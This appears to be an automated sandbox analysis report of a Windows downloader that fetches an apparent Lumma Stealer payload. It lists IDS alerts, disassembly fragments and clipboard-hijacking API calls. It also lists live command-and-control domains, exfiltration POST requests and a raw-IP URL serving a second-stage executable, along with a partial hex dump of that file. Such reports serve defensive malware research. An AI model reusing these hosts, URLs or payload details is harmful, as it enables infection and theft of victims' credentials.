        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ebx, edx1_2_0211DE57
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh1_2_02132F87
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then test esi, esi1_2_0212CC07
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then jmp eax1_2_02131C3E
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_020FAC99
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0211ECC9
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ecx, eax1_2_02106D15
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ebx, eax1_2_020F5D17
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ebp, eax1_2_020F5D17
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]1_2_02115D57
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0211BD67
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0210AD91
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0210BD88
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0211EDC6

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.48.1:443
        Source: Malware configuration extractorURLs: versersleep.shop
        Source: Malware configuration extractorURLs: apporholis.shop
        Source: Malware configuration extractorURLs: robinsharez.shop
        Source: Malware configuration extractorURLs: chipdonkeruz.shop
        Source: Malware configuration extractorURLs: skidjazzyric.click
        Source: Malware configuration extractorURLs: crowdwarek.shop
        Source: Malware configuration extractorURLs: handscreamny.shop
        Source: Malware configuration extractorURLs: femalsabler.shop
        Source: Malware configuration extractorURLs: soundtappysk.shop
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 09 Jan 2025 07:34:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 09 Jan 2025 07:30:02 GMTETag: "53600-62b40f23d5dfc"Accept-Ranges: bytesContent-Length: 341504Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a f6 05 ca 1e 97 6b 99 1e 97 6b 99 1e 97 6b 99 a3 d8 fd 99 1f 97 6b 99 00 c5 ef 99 3b 97 6b 99 00 c5 fe 99 00 97 6b 99 00 c5 e8 99 64 97 6b 99 39 51 10 99 1d 97 6b 99 1e 97 6a 99 6d 97 6b 99 00 c5 e1 99 1f 97 6b 99 00 c5 ff 99 1f 97 6b 99 00 c5 fa 99 1f 97 6b 99 52 69 63 68 1e 97 6b 99 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 7f f3 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 50 01 00 00 00 00 00 a5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 3f b1 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 2a 04 00 28 00 00 00 00 d0 04 00 68 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 47 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e4 86 00 00 00 40 04 00 00 60 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 bc 00 00 00 d0 04 00 00 ae 00 00 00 88 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
        Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
        Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.19:80
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.48.1:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 104.21.56.70:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CNN0JY6VKU6T6HGADNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UYLN8LW9RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8725Host: skidjazzyric.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ZIMRBWG3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20378Host: skidjazzyric.click
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029EA
        Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
        Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
        Source: global trafficDNS traffic detected: DNS query: post-to-me.com
        Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skidjazzyric.click
        Source: DLKs2Qeljg.exe, DLKs2Qeljg.exe, 00000000.00000002.4149199546.0000000000616000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000002.4149154646.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.0000000000616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
        Source: DLKs2Qeljg.exe, 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
        Source: DLKs2Qeljg.exe, 00000000.00000002.4149199546.0000000000616000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.0000000000616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe:
        Source: DLKs2Qeljg.exe, 00000000.00000002.4149199546.0000000000616000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010693772.0000000000616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeH
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: 67E6.tmp.exe, 00000001.00000002.1945858989.0000000000774000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778490432.0000000000789000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778438197.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: 67E6.tmp.exe, 00000001.00000003.1805724637.0000000002E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: DLKs2Qeljg.exe, 00000000.00000002.4149199546.000000000060B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
        Source: DLKs2Qeljg.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
        Source: DLKs2Qeljg.exe, 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
        Source: DLKs2Qeljg.exe, 00000000.00000002.4149124048.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
        Source: DLKs2Qeljg.exe, 00000000.00000003.4010693772.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000003.4010822804.000000000060A000.00000004.00000020.00020000.00000000.sdmp, DLKs2Qeljg.exe, 00000000.00000002.4149199546.000000000060B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE4
        Source: 67E6.tmp.exe, 00000001.00000003.1778438197.000000000076A000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778490432.0000000000789000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000002.1946451731.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778438197.0000000000774000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1778364316.0000000000768000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1819130013.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/
        Source: 67E6.tmp.exe, 00000001.00000003.1778438197.0000000000774000.00000004.00000020.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1805495947.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/api
        Source: 67E6.tmp.exe, 00000001.00000003.1805495947.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click/apiO
        Source: 67E6.tmp.exe, 00000001.00000003.1791704474.0000000002E2E000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1793311662.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1794561830.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1791170219.0000000002E2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click:443/api
        Source: 67E6.tmp.exe, 00000001.00000003.1779888049.0000000002E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
        Source: 67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: 67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: 67E6.tmp.exe, 00000001.00000003.1779888049.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779953578.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1791004004.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
        Source: 67E6.tmp.exe, 00000001.00000003.1779953578.0000000002E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
        Source: 67E6.tmp.exe, 00000001.00000003.1779888049.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779953578.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1791004004.0000000002E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
        Source: 67E6.tmp.exe, 00000001.00000003.1779953578.0000000002E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: 67E6.tmp.exe, 00000001.00000003.1779463412.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, 67E6.tmp.exe, 00000001.00000003.1779550317.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: 67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
        Source: 67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
        Source: 67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: 67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: 67E6.tmp.exe, 00000001.00000003.1806942657.0000000002F4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,EntryPoint,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,EntryPoint,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02121942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02121942
